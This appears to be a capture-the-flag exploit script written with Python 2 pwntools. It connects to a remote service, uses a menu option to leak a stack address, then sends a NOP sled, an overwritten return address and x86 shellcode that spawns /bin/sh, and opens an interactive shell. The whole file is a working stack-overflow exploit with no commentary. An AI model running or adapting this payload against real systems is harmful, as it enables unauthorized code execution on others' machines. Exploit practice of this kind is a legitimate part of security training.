from pwn import *
# p = remote("1.224.175.26",10020)
p = remote("10.211.55.3",12345)
print p.recvuntil("3. Exit")
p.sendline("1")
print p.recvuntil("Leak Size(0 ~ 1000)")
p.sendline("16")
leak = p.recv(8)
stack = u32(p.recv(4))
print hex(stack)
payload = "\x90"*48
payload += p32(stack-0x68-0x2c)
payload += "\x90"*10
payload += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
payload += "\x90"*10
p.sendline("2")
print p.recvuntil("Code : ")
p.sendline(payload)
print hex(stack-0x68)
p.interactive()